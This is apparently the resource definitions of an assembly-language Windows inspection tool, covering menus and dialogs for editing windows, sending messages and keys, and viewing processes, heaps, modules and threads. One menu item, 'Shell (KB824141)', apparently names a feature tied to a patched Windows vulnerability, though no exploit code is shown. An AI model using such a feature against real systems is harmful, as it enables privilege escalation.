			menuitem "&Transparency...",IDM_WIN_TRANSPARENCY,0
			menuitem "St&yles...",IDM_WIN_STYLES,0
			menuitem "E&xtended styles...",IDM_WIN_EXSTYLES,0
			menuseparator
			menuitem "Edit &menu...",IDM_WIN_EDITMENU,0
			menuitem "Edit system men&u...",IDM_WIN_EDITSYSMENU,0
			menuitem "Edit t&itle...",IDM_WIN_EDITTITLE,0
			menuitem "Change &position...",IDM_WIN_CHPOS,0
			menuitem "Send messa&ge...",IDM_WIN_SENDMSG,0
			menuitem "Send &keys...",IDM_WIN_SENDKEYS,0
			menuitem "Specia&l",0,MFR_POPUP
				menuitem "&Listbox...",IDM_WIN_SPECIAL_LISTBOX,0
				menuitem "&Combobox...",IDM_WIN_SPECIAL_COMBOBOX,0
				menuitem "List &View...",IDM_WIN_SPECIAL_LISTVIEW,0
				menuitem "&Tree View...",IDM_WIN_SPECIAL_TREEVIEW,0
				menuitem "Tool&bar...",IDM_WIN_SPECIAL_TOOLBAR,0
				menuitem "&Statusbar...",IDM_WIN_SPECIAL_STATUSBAR,0
				menuitem "T&ab...",IDM_WIN_SPECIAL_TAB,MFR_END
			menuseparator
			menuitem "C&opy",0,MFR_POPUP
				menuitem "&Handle",IDM_WIN_COPY_HANDLE,0
				menuitem "&ID",IDM_WIN_COPY_ID,0
				menuitem "&Title",IDM_WIN_COPY_TITLE,0
				menuitem "&Class",IDM_WIN_COPY_CLASS,MFR_END
			menuseparator
			menuitem "&Shell (KB824141)",IDM_WIN_SHELL,0
			menuseparator
			menuitem "&Destroy",IDM_WIN_DESTROY,0
			menuitem "&Quit (Thread)",IDM_WIN_QUITTHREAD,0
			menuitem "&Close",IDM_WIN_CLOSE,MFR_END
		menuitem "&Processes",0,MFR_POPUP
			menuitem "Refresh",IDM_PROC_REFRESH,0
			menuseparator
			menuitem "Goto &Parent Process",IDM_PROC_GOTOPARENT,0
			menuitem "Goto &Heaps",IDM_PROC_GOTOHEAPS,0
			menuitem "Goto &Modules",IDM_PROC_GOTOMODULES,0
			menuitem "Goto &Threads",IDM_PROC_GOTOTHREADS,0
			menuseparator
			menuitem "&Terminate",IDM_PROC_TERMINATE,MFR_END
		menuitem "&Menu",0,MFR_POPUP+MFR_END
			menuitem "&Edit...",IDM_MENU_EDIT,0
			menuseparator
			menuitem "&Insert...",IDM_MENU_INSERT,MFR_END

	; main dialog
	dialog main,_TITLE,0,0,264,236,DS_CENTER+WS_THICKFRAME+WS_CAPTION+WS_SYSMENU+WS_MINIMIZEBOX,0,0,"Tahoma",8
		dialogitem "SysTabControl32","Tab",ID_MAIN_TAB,0,0,0,0,TCS_TABS+WS_TABSTOP+WS_VISIBLE
	enddlg
	; windows tab
	dialog windows,"Windows",0,0,0,0,WS_CHILD+WS_TABSTOP,0,0,"Tahoma",8
		dialogitem "SysListView32","Windows",ID_WIN_WINDOWS,0,0,0,0,LVS_REPORT+LVS_SINGLESEL+LVS_SHOWSELALWAYS+LVS_SHAREIMAGELISTS+WS_TABSTOP+WS_VISIBLE+WS_BORDER
	enddlg
	; processes tab
	dialog processes,"Processes",0,0,0,0,WS_CHILD+WS_TABSTOP,0,0,"Tahoma",8
		dialogitem "SysListView32","Processes",ID_PROC_PROCESSES,0,0,0,0,LVS_REPORT+LVS_SINGLESEL+LVS_SHOWSELALWAYS+LVS_SHAREIMAGELISTS+WS_TABSTOP+WS_VISIBLE+WS_BORDER
	enddlg
	; heaps tab
	dialog heaps,"Heaps",0,0,0,0,WS_CHILD+WS_TABSTOP,0,0,"Tahoma",8
		dialogitem "SysListView32","Heaps",ID_HEAPS_HEAPS,0,0,0,0,LVS_REPORT+LVS_SINGLESEL+LVS_SHOWSELALWAYS+LVS_SHAREIMAGELISTS+WS_TABSTOP+WS_VISIBLE+WS_BORDER
	enddlg
	; modules tab
	dialog modules,"Modules",0,0,0,0,WS_CHILD+WS_TABSTOP,0,0,"Tahoma",8
		dialogitem "SysListView32","Modules",ID_MOD_MODULES,0,0,0,0,LVS_REPORT+LVS_SINGLESEL+LVS_SHOWSELALWAYS+LVS_SHAREIMAGELISTS+WS_TABSTOP+WS_VISIBLE+WS_BORDER
	enddlg
	; threads tab
	dialog threads,"Threads",0,0,0,0,WS_CHILD+WS_TABSTOP,0,0,"Tahoma",8
		dialogitem "COMBOBOX","Process",ID_THREADS_PROCESS,0,0,0,64,CBS_DROPDOWNLIST+WS_VSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "SysListView32","Threads",ID_THREADS_THREADS,0,0,0,0,LVS_REPORT+LVS_SINGLESEL+LVS_SHOWSELALWAYS+LVS_SHAREIMAGELISTS+WS_TABSTOP+WS_VISIBLE+WS_BORDER
	enddlg
	; menulist dialog
	dialog menulist,"Edit Menu",0,0,0,0,DS_MODALFRAME+WS_THICKFRAME+WS_CAPTION+WS_SYSMENU+WS_MINIMIZEBOX,0,0,"Tahoma",8
		dialogitem "SysListView32","Menu",ID_MENULIST_MENULIST,0,0,0,0,LVS_REPORT+LVS_SINGLESEL+LVS_SHOWSELALWAYS+LVS_SHAREIMAGELISTS+WS_TABSTOP+WS_VISIBLE+WS_BORDER
	enddlg
	; inputbox dialog
	dialog inputbox,"Input Box",0,0,180,58,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
		dialogitem "STATIC","",ID_INPUTBOX_PROMPT,4,4,172,12,WS_VISIBLE
		dialogitem "EDIT","",ID_INPUTBOX_VALUE,4,16,172,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","",0,4,34,172,12,SS_ETCHEDHORZ+WS_VISIBLE
		dialogitem "BUTTON","&OK",ID_INPUTBOX_OK,30,40,52,14,BS_DEFPUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Cancel",ID_INPUTBOX_CANCEL,96,40,52,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
	enddlg
	; chpos dialog
	dialog chpos,"Change Position",0,0,140,70,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
		dialogitem "BUTTON","Sc&reen",ID_CHPOS_SCREEN,4,4,62,12,BS_AUTORADIOBUTTON+BS_RIGHT+BS_RIGHTBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","Clie&nt",ID_CHPOS_CLIENT,74,4,62,12,BS_AUTORADIOBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "STATIC","&Left:",0,4,18,32,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_CHPOS_LEFT,38,18,32,12,ES_NUMBER+ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&Top:",0,70,18,32,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_CHPOS_TOP,104,18,32,12,ES_NUMBER+ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&Width:",0,4,32,32,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_CHPOS_WIDTH,38,32,32,12,ES_NUMBER+ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&Height:",0,70,32,32,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_CHPOS_HEIGHT,104,32,32,12,ES_NUMBER+ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","",0,4,48,132,12,SS_ETCHEDHORZ+WS_VISIBLE
		dialogitem "BUTTON","&Set",ID_CHPOS_SET,4,52,42,14,BS_DEFPUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","C&enter",ID_CHPOS_CENTER,49,52,42,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Close",ID_CHPOS_CLOSE,94,52,42,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
	enddlg
	; sendmessage dialog
	dialog sendmsg,"Send Message",0,0,180,86,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
		dialogitem "STATIC","&hWnd:",0,4,4,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_SENDMSG_HWND,48,4,124,12,ES_AUTOHSCROLL+ES_READONLY+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&Message:",0,4,18,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "COMBOBOX","",ID_SENDMSG_MSG,48,18,124,48,CBS_DROPDOWNLIST+WS_TABSTOP+WS_VISIBLE+WS_BORDER+WS_VSCROLL
		dialogitem "STATIC","&wParam:",0,4,32,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_SENDMSG_WPARAM,48,32,124,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&lParam:",0,4,46,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_SENDMSG_LPARAM,48,46,124,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","",0,4,62,172,12,SS_ETCHEDHORZ+WS_VISIBLE
		dialogitem "BUTTON","&Send Message",ID_SENDMSG_SENDMSG,24,68,58,14,BS_DEFPUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Post Message",ID_SENDMSG_POSTMSG,98,68,58,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
	enddlg
	; flags dialog
	dialog flags,"Edit Flags",0,0,180,140,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
		dialogitem "BUTTON","&Named",ID_FLAGS_NAMED,4,4,82,12,BS_AUTORADIOBUTTON+BS_RIGHT+BS_RIGHTBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Binary",ID_FLAGS_BINARY,94,4,82,12,BS_AUTORADIOBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "LISTBOX","",ID_FLAGS_LIST,4,20,172,60,LBS_NOINTEGRALHEIGHT+LBS_HASSTRINGS+LBS_OWNERDRAWFIXED+LBS_NOTIFY+WS_TABSTOP+WS_VISIBLE+WS_BORDER+WS_VSCROLL
		dialogitem "STATIC","&Additional:",ID_FLAGS_ADDITIONALLABEL,4,84,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_FLAGS_ADDITIONAL,48,84,124,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&Flags:",0,4,100,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_FLAGS_FLAGS,48,100,124,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","",0,4,116,172,12,SS_ETCHEDHORZ+WS_VISIBLE
		dialogitem "BUTTON","&OK",ID_FLAGS_OK,24,122,58,14,BS_DEFPUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Cancel",ID_FLAGS_CANCEL,98,122,58,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
	enddlg
	; sendkeys dialog
	dialog sendkeys,"Send Keys",0,0,180,92,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
		dialogitem "EDIT","",ID_SENDKEYS_KEYS,4,4,172,60,ES_WANTRETURN+ES_MULTILINE+ES_AUTOHSCROLL+ES_AUTOVSCROLL+WS_VSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","",0,4,68,172,12,SS_ETCHEDHORZ+WS_VISIBLE
		dialogitem "BUTTON","&Send",ID_SENDKEYS_SEND,30,74,52,14,BS_DEFPUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Close",ID_SENDKEYS_CLOSE,96,74,52,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
	enddlg
	; editmenu dialog
	dialog editmenu,"Edit Menu",0,0,180,100,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
		dialogitem "STATIC","&ID:",0,4,4,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_EDITMENU_ID,48,4,124,12,ES_AUTOHSCROLL+ES_NUMBER+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&Type:",0,4,18,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_EDITMENU_TYPE,48,18,106,12,ES_AUTOHSCROLL+ES_READONLY+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "BUTTON","...",ID_EDITMENU_EDITTYPE,156,18,16,12,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "STATIC","St&ate:",0,4,32,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_EDITMENU_STATE,48,32,106,12,ES_AUTOHSCROLL+ES_READONLY+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "BUTTON","...",ID_EDITMENU_EDITSTATE,156,32,16,12,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "STATIC","Type &Data:",0,4,46,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_EDITMENU_TYPEDATA,48,46,106,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "BUTTON","...",ID_EDITMENU_EDITTYPEDATA,156,46,16,12,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "STATIC","&Item Data:",0,4,60,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_EDITMENU_ITEMDATA,48,60,124,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","",0,4,76,172,12,SS_ETCHEDHORZ+WS_VISIBLE
		dialogitem "BUTTON","&OK",ID_EDITMENU_OK,24,82,58,14,BS_DEFPUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Cancel",ID_EDITMENU_CANCEL,98,82,58,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
	enddlg
	; listbox dialog
	dialog listbox,"ListBox",0,0,180,140,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
		dialogitem "SysListView32","List",ID_LISTBOX_LIST,4,4,172,60,LVS_REPORT+LVS_SINGLESEL+LVS_SHOWSELALWAYS+LVS_SHAREIMAGELISTS+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&Title:",0,4,68,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_LISTBOX_TITLE,48,68,124,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","Item &Data:",0,4,84,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_LISTBOX_ITEMDATA,48,84,124,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","",0,4,100,172,12,SS_ETCHEDHORZ+WS_VISIBLE
		dialogitem "BUTTON","&Add",ID_LISTBOX_ADD,8,106,54,14,BS_DEFPUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Update",ID_LISTBOX_UPDATE,64,106,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE+WS_DISABLED
		dialogitem "BUTTON","&Remove",ID_LISTBOX_REMOVE,120,106,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","Move &Up",ID_LISTBOX_MOVEUP,8,122,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","Move &Down",ID_LISTBOX_MOVEDOWN,64,122,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Close",ID_LISTBOX_CLOSE,120,122,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
	enddlg
	; combobox dialog
	dialog combobox,"ComboBox",0,0,180,140,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
		dialogitem "SysListView32","List",ID_COMBOBOX_LIST,4,4,172,60,LVS_REPORT+LVS_SINGLESEL+LVS_SHOWSELALWAYS+LVS_SHAREIMAGELISTS+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&Title:",0,4,68,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_COMBOBOX_TITLE,48,68,128,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","Item &Data:",0,4,84,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_COMBOBOX_ITEMDATA,48,84,128,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","",0,4,102,172,12,SS_ETCHEDHORZ+WS_VISIBLE
		dialogitem "BUTTON","&Add",ID_COMBOBOX_ADD,8,106,54,14,BS_DEFPUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Update",ID_COMBOBOX_UPDATE,64,106,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE+WS_DISABLED
		dialogitem "BUTTON","&Remove",ID_COMBOBOX_REMOVE,120,106,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","Move &Up",ID_COMBOBOX_MOVEUP,8,122,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","Move &Down",ID_COMBOBOX_MOVEDOWN,64,122,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Close",ID_COMBOBOX_CLOSE,120,122,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
	enddlg
	; listview dialog
	dialog listview,"ListView",0,0,180,222,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
		dialogitem "SysListView32","List",ID_LISTVIEW_LIST,4,4,172,60,LVS_REPORT+LVS_SINGLESEL+LVS_SHOWSELALWAYS+LVS_SHAREIMAGELISTS+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&Mask:",0,4,68,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_LISTVIEW_MASK,48,68,108,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "BUTTON","...",ID_LISTVIEW_MASKEDIT,160,68,16,12,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "STATIC","&Item:",0,4,84,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_LISTVIEW_ITEM,48,84,128,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","Su&b Item:",0,4,100,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_LISTVIEW_SUBITEM,48,100,128,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&State:",0,4,116,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_LISTVIEW_STATE,48,116,108,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "BUTTON","...",ID_LISTVIEW_STATEEDIT,160,116,16,12,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "STATIC","State &Mask:",0,4,132,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_LISTVIEW_STATEMASK,48,132,108,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "BUTTON","...",ID_LISTVIEW_STATEMASKEDIT,160,132,16,12,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "STATIC","&Text:",0,4,148,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_LISTVIEW_TEXT,48,148,128,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","Ima&ge:",0,4,164,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_LISTVIEW_IMAGE,48,164,128,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","&Param:",0,4,180,42,12,SS_RIGHT+SS_CENTERIMAGE+WS_VISIBLE
		dialogitem "EDIT","",ID_LISTVIEW_PARAM,48,180,128,12,ES_AUTOHSCROLL+WS_TABSTOP+WS_VISIBLE+WS_BORDER
		dialogitem "STATIC","",0,4,198,172,12,SS_ETCHEDHORZ+WS_VISIBLE
		dialogitem "BUTTON","&Add",ID_LISTVIEW_ADD,8,204,54,14,BS_DEFPUSHBUTTON+WS_TABSTOP+WS_VISIBLE
		dialogitem "BUTTON","&Update",ID_LISTVIEW_UPDATE,64,204,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE+WS_DISABLED
		dialogitem "BUTTON","&Close",ID_LISTVIEW_CLOSE,120,204,54,14,BS_PUSHBUTTON+WS_TABSTOP+WS_VISIBLE
	enddlg
	; treeview dialog
	dialog treeview,"TreeView",0,0,180,100,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
	enddlg
	; toolbar dialog
	dialog toolbar,"Toolbar",0,0,180,100,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
	enddlg
	; statusbar dialog
	dialog statusbar,"Statusbar",0,0,180,100,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
	enddlg
	; tab dialog
	dialog tab,"Tab",0,0,180,100,DS_CENTER+DS_MODALFRAME+WS_CAPTION+WS_SYSMENU,0,0,"Tahoma",8
	enddlg
	; icons
	icon mainicon,main32x32x4icondata,"res/32x32x4.ico",\
		      main16x16x4icondata,"res/16x16x4.ico"
	; imagelist bitmap
	bitmap imagelistbitmap,"res/imglist.bmp"
;##########################################################################
;##########################################################################